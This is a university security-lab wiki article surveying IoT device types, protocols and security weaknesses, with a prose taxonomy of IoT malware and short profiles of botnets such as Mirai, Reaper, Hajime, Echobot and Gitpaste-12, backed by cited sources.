IoT Malware

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search

Internet of Things (IoT) Malware: Theoretical Foundations and Types

Overview

The Internet of Things (IoT) refers to the network of interconnected devices capable of collecting, exchanging, and analyzing data. Coined by Kevin Ashton in 1999, the concept has grown significantly over the years. By 2008, the number of connected devices surpassed the world population, reaching over 8 billion. IoT devices are employed in various sectors, including smart homes, healthcare, transportation, agriculture, and more. However, the convenience offered by these devices often overshadows their security risks. [1]

Types of Connected Devices in IoT

Applications

  1. Smart Homes and Cities: Enhance life quality through energy efficiency and convenience but pose security risks due to processing sensitive data.
  2. Wearables for Health Monitoring: Collect personal health data, necessitating stringent protection measures.
  3. Transport and Logistics: Use RFID toll sensors and tracking for supply chain efficiency.
  4. Automotive Industry: Sensors and autonomous driving technologies introduce new data security and privacy challenges.
  5. Medical and Healthcare: Require robust security to protect sensitive patient data.
  6. Aviation and Telecommunications: Demand reliable and secure IoT solutions to prevent catastrophic failures.
  7. Agriculture and Livestock Management: Benefit from IoT for efficiency but need protection against environmental factors and cyber threats. [2]


Wireless Protocols

  1. Cellular (GSM, GPRS, 3G, 4G, LTE, 5G): Ideal for applications requiring mobility and remote connectivity.[1]
  2. Wi-Fi (IEEE 802.11): Suitable for building-based IoT applications, like smart home devices.
  3. Zigbee: A low-energy protocol, perfect for energy-efficient applications like smart home sensors.
  4. Z-Wave: Similar to Zigbee but operates on slightly different frequencies, commonly used in home automation.
  5. Bluetooth (including Low Energy): Best for short-range, low-energy applications like wearables and health monitors.
  6. 6LoWPAN: Facilitates IPv6 packet transmission over low-energy wireless networks, useful for devices with limited computing resources. [3]


Communication Protocols

  1. MQTT (Message Queuing Telemetry Transport): Lightweight, efficient for devices with limited resources or low-bandwidth networks.
  2. XMPP (Extensible Messaging and Presence Protocol): Initially developed for instant messaging, adaptable for various IoT applications.
  3. DDS (Data Distribution Service for Real-Time Systems): Focused on real-time data exchange, used in critical systems like aviation or healthcare.
  4. AMQP (Advanced Message Queuing Protocol): Ensures reliable, secure messaging, suitable for enterprise-level and complex IoT systems.

Security Concerns in IoT

Priorities

  1. Availability: Crucial for time-sensitive functions in medical or industrial applications.[4]
  2. Integrity: Vital to avoid malfunctions and misinterpretations in critical decision-making scenarios.
  3. Confidentiality: Important but often considered less critical than availability and integrity.[5]


Challenges

  1. Vulnerability Management: Many IoT devices lack the capability for regular updates, leaving known security gaps unpatched.[1]
  2. Limited Resources: Small form factors and low power consumption restrict computing capabilities, complicating the implementation of complex security measures like advanced encryption.
  3. User Interface Limitations: Lack of comprehensive user interfaces leads to a lower awareness of security settings and risks.
  4. Protocol Limitations: Some IoT protocols do not inherently support encryption or authentication, making devices vulnerable to attacks like Man-in-the-Middle.
  5. Weak Password Protection: Hard-coded and default passwords are major security loopholes. Mirai and Reaper malware exploited these vulnerabilities to create large-scale botnets. Manufacturers should implement secure default settings and robust authentication mechanisms, like two-factor authentication and digital certificates​​.
  6. Lack of Regular Patches and Updates: IoT devices become vulnerable over time if not regularly updated. Satori malware exploited this by targeting specific WiFi routers. Manufacturers should provide regular security updates, and network managers should ensure secure update mechanisms, including encrypted exchanges for authenticity.
  7. Insecure Interfaces: Many vulnerabilities stem from insecure web, application API, cloud, and mobile interfaces. Common issues include insufficient authentication and weak encryption. Solutions include robust device authentication and digital certificates to ensure secure data transfer.
  8. Insufficient Data Protection: IoT devices often lack secure data storage and network segregation. This can lead to breaches like the 2017 casino attack through a thermostat. Cryptography is crucial for protecting data in motion and at rest.
  9. Poor IoT Device Management: A study revealed that up to 15% of devices in networks were unknown or unauthorized, and many used unsupported legacy operating systems. IoT device management platforms can significantly reduce vulnerabilities by providing lifecycle management capabilities​​.
  10. The IoT Skills Gap: Addressing IoT security requires skilled personnel. Companies face challenges in hiring new talents and must rely on training and upskilling existing teams to handle IoT security effectively.

IoT Malware: In-Depth Analysis and Types

Evolution and Threat Landscape

Over time, malware has evolved significantly in complexity and destructive potential, posing a threat to a wide range of devices. This section delves into various malware types defined by their functions and behaviors, including worms, Trojans, viruses, spyware, ransomware, rootkits, and backdoors. Notably, IoT malware often combines elements from different malware categories. However, it's important to note that malware categorization is not always clear-cut. A common characteristic of this malware is its reliance on botnets for distribution, command execution, control, and monitoring of infected systems.

Classification of IoT Malware

Worms

Self-propagating malware that spreads autonomously within IoT devices. Examples include Mirai, Darlloz, Brickerbot, and Gitpaste-12. Notably, Hajime, a WhiteHat malware, can counteract other malware, offering a unique perspective on IoT malware functionality. [6]

Trojans

Trojans disguise themselves as harmless but contain hidden malicious functions. Unlike viruses, they cannot replicate themselves. An example is ProxyM, known for DDoS attacks and email spamming.

Viruses

Viruses attack IoT devices by self-replicating. The Silex virus, for instance, causes permanent DoS attacks, demonstrating the severe impact of IoT viruses.

Spyware

Spyware in IoT allows for the covert surveillance of data through infected devices. SpyCon is an instance of spyware that monitors user activities through smart home devices and mobile phones.

Ransomware

This malware type takes devices hostage and demands a ransom for their release.

Backdoor

Backdoors in IoT devices are hidden access mechanisms, often introduced by manufacturers, posing significant security risks. Examples include Tsunami and Bashlite.

IoT Malware Spread Mechanisms

Command-and-Control (C&C)

A centralized structure that commands bots via communication protocols like Internet Relay Chat or Hypertext Transfer Protocol. Its simplicity makes it common, but its central server is also a vulnerability. Examples include Mirai, Aidra, and Okane. [7]

Peer-to-Peer (P2P)

A decentralized architecture where each bot acts as both server and client, making network disruption challenging. An example of P2P-based IoT malware is the Hajime worm.

Characteristics and Functionality of IoT Malware

Malware targets unauthorized access or compromise of IoT devices. Common methods include malvertising, phishing emails, infected USB drives, and fake software installations.

Attack Methods

  • DDoS Attacks: Overload resources to make them inaccessible. Examples: Mirai, Kaiji. [8]
  • Coin Mining: Malware like Fritzfrog and Satori use compromised IoT devices for cryptocurrency mining.
  • Spamming: ProxyM uses infected devices for spamming.
  • Data Exfiltration: Malware like Mozi executes unauthorized data transfers.
  • PDoS Attacks: Permanently damage hardware, e.g., Brickerbot.
  • DNS Spoofing: Change DNS entries to redirect traffic to harmful sites.
  • Command Injection: Exploit vulnerable web interfaces or applications to execute commands on IoT devices.
  • Payload Execution: Malware remains dormant until activated.
  • Ransomware: Encrypts device files and demands ransom.
  • Industrial Espionage: Targets industrial operations, often focusing on SCADA systems.
  • Website Hacking: Unauthorized access to websites for data theft or malware placement.
  • Click Fraud: Manipulates online marketing by generating fake clicks.
  • Other Attack Types: Includes less common types like White-Hat attacks and unauthorized data downloading or removal.

Attack Vectors

IoT malware targets various vulnerabilities, including network, human, and software surfaces. In IoT, distinctions are made between network and device level, service level, firmware level, and device level.

  • Network and Network Devices: Vulnerabilities in IoT networks and firewalls.[9]
  • Services: Vulnerabilities in Software as a Service and Server as a Service offerings.
  • Firmware: Central to device communication and often a target of PDoS attacks.
  • Devices: Specific device components can be targeted, including ports, storage media, RAM, and hardware.

Device Access Mechanisms

IoT devices can be accessed via intranet or internet, offering various mechanisms for malware to exploit.

  • Brute-Force Attacks: Continuous input of login credentials to gain access.
  • CVE Exploits: Utilization of public security vulnerabilities.
  • Targeted Access Mechanisms: Specific targeting of devices based on geography, industry, etc.

IoT Malware Characteristics

  • Virtual Environment Detection: Determines if running in a virtual environment to avoid detection.[9]
  • Surviving Reboots: Copies itself to startup directories.
  • Stealth: Hides presence to avoid detection.
  • Transforming Device Functions: Converts devices into networks, honeypots, or proxy servers.
  • Reboot Prevention: Avoids device restart to prevent malware removal.
  • Port Closure: Closes unused ports to reduce vulnerabilities.
  • Creating New Variants: Developers release source codes for creating new variants.
  • Service Provision: Some malware offers DDoS-for-hire or ransomware services.
  • Packet Size: Malicious network traffic can exhibit unusual packet sizes.
  • Architecture Detection: Sends payloads matching the device's architecture.
  • Periodic Command Execution: Similar to CRON jobs, executes specific commands at intervals.
  • Binary File Removal: Removes binary files to remain in RAM and avoid detection.
  • Name Theft and Assignment: Steals or assigns random names to processes for concealment.
  • UPX Header Manipulation: Uses fake UPX headers to hinder analysis.

Prominent Examples of Successful IoT Malware

  • Mirai: Mirai is a well-known malware that specifically targets IoT devices operating on the Linux system. It gains access through Telnet ports (23 or 2323) via brute-force attacks. This malware converts the infected devices into bots for a botnet, used predominantly for large-scale DDoS attacks. Mirai has a wide target range, affecting devices across multiple architectures such as ARM, MIPS, and X86. Historically significant, Mirai was responsible for notable disruptions, including the attacks on journalist Brian Krebs's website and the DNS provider Dyn in 2016. The release of its source code on Hackforums by an individual known as Anna-senpai led to a surge in IoT botnet activities. Mirai's unique characteristics include monopolizing infected devices, obscuring its process name, employing a specialized CB server for device infection, and using advanced SYN scanning technology. It is capable of executing a variety of attack methods including UDP floods, DNS water torture, and SYN floods. For detection, ISPs can identify bot devices and CNC servers by scrutinizing network traffic for specific patterns. Defense against Mirai involves a strategy where a defensive program continuously connects to port 48101, causing any infecting Mirai instance to self-terminate. [10]
  • IoTReaper (Reaper): First reported by the IT analyst yegenshen at Netlab 360 in October 2017, IoTReaper, also known as Reaper, is a botnet targeting IoT devices. Differing from Mirai, Reaper exploits specific vulnerabilities rather than using default passwords. By November 2017, it had infected about 28,000 devices, with millions more potentially vulnerable. The malware uses exploits from nine IoT devices, including routers and cameras from D-Link, Netgear, and others. Notably agile, its authors quickly integrate new vulnerabilities into the botnet. Reaper operates on a LUA scripting environment, enhancing its capability for complex attacks. The botnet's architecture includes a downloader, controller, reporter, and loader for different operations. Although its full intent was unknown as of late 2017, the botnet's potential for large-scale attacks and facilitating other malware types was significant. Reaper's success in evading common IT security measures highlights the need for deep packet inspection and real-time anomaly detection for effective defense. [11] [12]
  • Hajime: First observed in October 2016 by RapidityNetworks, Hajime is an IoT worm that creates a vast peer-to-peer botnet, which had reached nearly 300,000 devices by April 2017. Its purpose remains unclear, as it has not been used for malicious activities. Hajime is known for its evolving capabilities, using methods like TR-069 exploitation, Telnet default password attacks, and Arris cable modem attacks. It targets a wide range of IoT devices and continuously updates its attack vectors, making it a sophisticated and adaptable threat. The worm has an architecture detection mechanism to ensure the appropriate binary is used for different device architectures, and it employs smart password bruteforcing for specific brands and devices. Despite its size and capabilities, Hajime has notably avoided attacking certain networks and regions. [13] [14]
  • Echobot: Emerging in mid-May, Echobot is a Mirai variant initially identified by Palo Alto Networks and subsequently analyzed by Akamai. It doesn't alter the original Mirai source code but adds numerous modules. Initially, Echobot targeted 18 vulnerabilities, rapidly evolving to exploit 26, and then over 50. This variant is known for its broad targeting of IoT devices and enterprise applications, including vulnerabilities in products like Oracle WebLogic and VMware SD-WAN. Its exploit selection includes a range of vulnerabilities, both old and new, without preference for age. Security researcher Carlos Brendel noted that Echobot's exploit list provides insight into the most attacked devices and vulnerabilities, as it includes the most effective exploits for botnet propagation. Echobot's architecture is designed to cover a wide range of processor architectures, making it a significant threat to a diverse array of systems. [15] [16]
  • Gitpaste-12: Detected by Juniper Threat Labs in October 2020, Gitpaste-12 is a sophisticated botnet that uses GitHub and Pastebin for hosting its components. Named for its use of 12 known vulnerabilities, Gitpaste-12 is designed to attack Linux servers and IoT devices, leveraging exploits in popular open-source components like Apache Struts and mongoDB. The malware sets up cron jobs for persistence and employs various methods, including a Monero cryptocurrency miner, brute-force attacks, and reverse shells. Gitpaste-12’s ability to use trusted sites for hosting and its varied attack vectors make it a significant threat. The malware's development indicates ongoing efforts to evolve its capabilities, highlighting the importance of vigilance in software supply chain security.[17] [18]
  1. 1.0 1.1 1.2 Fotios Chantzis, "Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things," No Starch Press, 2021, ISBN 978-1-7185-0091-4.
  2. "5 Key IoT Applications in Smart Cities" - available under: https://www.iotforall.com/5-key-iot-applications-in-smart-cities/ - Retrieved 2023-12-17.
  3. "Top 10 IoT Segments in 2020 – Based on 1,600 Real IoT Projects" - available under: https://iot-analytics.com/top-10-iot-segments-2020/ - Retrieved 2023-12-17.
  4. "Number of Connected IoT Devices" - available under: https://iotanalytics.com/number-connected-iot-devices - Retrieved 2023-12-23.
  5. "IoT Security: Threats and Solutions Report 2020" - available under: https://iot-analytics.com/iot-security-threats-and-solutions-report-2020/ - Retrieved 2023-12-23.
  6. "A survey of IoT malware and detection methods based on static features" - available under: https://www.sciencedirect.com/science/article/pii/S2405959520300503 - Retrieved 2023-12-23.
  7. Victor, P., Lashkari, A.H., Lu, R. et al. "IoT malware: An attribute-based taxonomy, detection mechanisms and challenges." Peer-to-Peer Netw. Appl. 16, 1380–1431 (2023). Available at: https://doi.org/10.1007/s12083-023-01478-w - Retrieved 2024-01-05.
  8. "Cyber security common attack methods" - available under: https://censis.org.uk/what-we-do/sensing-imaging-iot/internet-of-things-iot/cyber-security-common-attack-methods/ - Retrieved 2024-01-05.
  9. 9.0 9.1 "The IoT Attack Surface: Threats and Security Solutions" - available under: https://www.trendmicro.com/vinfo/mx/security/news/internet-of-things/the-iot-attack-surface-threats-and-security-solutions - Retrieved 2024-01-05.
  10. "The Mirai Botnet: Threats and Mitigations" - available under: https://www.cisecurity.org/insights/blog/the-mirai-botnet-threats-and-mitigations - Retrieved 2024-01-05.
  11. "New Rapidly Growing IoT Botnet Reaper" - available under: https://success.trendmicro.com/dcx/s/solution/1118928-new-rapidly-growing-iot-botnet-reaper?language=en_US&sfdcIFrameOrigin=null - Retrieved 2024-01-05.
  12. "Linux.IotReaper Analysis" - available under: https://www.securityartwork.es/2018/02/14/linux-iotreaper-analysis/ - Retrieved 2024-01-05.
  13. "Rise of Botnets: Mirai & Hajime" - available under: https://www.radware.com/security/ddos-threats-attacks/ddos-attack-types/rise-of-botnets-mirai-hajime/ - Retrieved 2024-01-05.
  14. "Hajime – the mysterious evolving botnet" - available under: https://securelist.com/hajime-the-mysterious-evolving-botnet/78160/ - Retrieved 2024-01-05.
  15. "Cyber Alerts 2019 CC-3101" - available under: https://digital.nhs.uk/cyber-alerts/2019/cc-3101 - Retrieved 2024-01-05.
  16. "Echobot Malware Now Up to 71 Exploits - Targeting SCADA" - available under: https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada - Retrieved 2024-01-05.
  17. "Cyber Alerts 2020 CC-3663" - available under: https://digital.nhs.uk/cyber-alerts/2020/cc-3663 - Retrieved 2024-01-05.
  18. "Gitpaste-12 Worm Botnet Returns with 30+ Vulnerability Exploits" - available under: https://www.bleepingcomputer.com/news/security/gitpaste-12-worm-botnet-returns-with-30-plus-vulnerability-exploits/ - Retrieved 2024-01-05.
Retrieved from "https://wiki.elvis.science/index.php?title=IoT_Malware&oldid=13505"